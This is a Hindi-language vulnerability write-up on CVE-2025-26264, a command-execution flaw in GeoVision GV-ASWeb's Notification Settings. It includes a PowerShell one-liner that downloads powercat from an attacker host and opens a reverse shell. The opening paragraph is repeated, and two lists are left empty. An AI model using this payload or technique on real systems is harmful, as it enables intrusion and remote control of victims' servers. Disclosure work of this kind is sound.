
CVE-2025-26264 - GeoVision GV-ASWeb संस्करण 6.1.2.0 या उससे कम में, इसकी Notification Settings सुविधा के भीतर एक Remote Code Execution (RCE) भेद्यता मौजूद है। ASWeb में "System Settings" विशेषाधिकारों वाला एक प्रमाणित हमलावर इस दोष का फायदा उठाकर सर्वर पर मनमाने कमांड निष्पादित कर सकता है, जिससे सिस्टम से पूर्ण समझौता हो सकता है।
CVE-2025-26264 - GeoVision GV-ASWeb संस्करण 6.1.2.0 या उससे कम, अपनी Notification Settings सुविधा में Remote Code Execution (RCE) भेद्यता रखता है। ASWeb में "System Settings" विशेषाधिकार वाला एक प्रमाणित हमलावर इस दोष का फायदा उठाकर सर्वर पर मनमाने कमांड निष्पादित कर सकता है, जिससे सिस्टम से पूरी तरह समझौता हो सकता है।
सफल हमला करने के लिए एक हमलावर को निम्न की आवश्यकता होती है:
इस भेद्यता का उपयोग करके निम्नलिखित अनधिकृत कार्य किए जा सकते हैं:
GeoVision GV-ASManager के ASWeb प्लेटफॉर्म में Remote Code Execution भेद्यता का शोषण संस्करण 6.1.2.0 या उससे कम के विरुद्ध संभव है (26 फरवरी 2025 तक कोई फिक्स उपलब्ध नहीं है)।
GeoVision ASManager का ASWeb फ़ंक्शन Notification Setting RCE के प्रति संवेदनशील है
विशिष्ट घटना पर सूचना सेट करने का HTTP अनुरोध: TAWeb लॉगिन प्रयास विफल
इस स्क्रिप्ट के अनुसार, यदि TAWeb लॉगिन प्रयास विफल होता है, तो निम्न PowerShell स्क्रिप्ट निष्पादित की जाएगी:
powershell.exe Set-ExecutionPolicy Bypass -Force;IEX(New-Object System.Net.WebClient).DownloadString('http://LHOST/powercat.ps1');powercat -c LHOST -p LPORT -e powershell
TAWeb में प्रमाणीकरण का एक विफल प्रयास
पीड़ित का होस्ट: स्क्रिप्ट हमलावर के होस्ट के लिए एक बैकडोर खोलती है।
हमलावर का होस्ट: हमलावर को शेल प्राप्त होता है
यदि आपका कोई प्रश्न है, तो आप मुझसे LinkedIn पर संपर्क कर सकते हैं, Giorgi Dograshvili।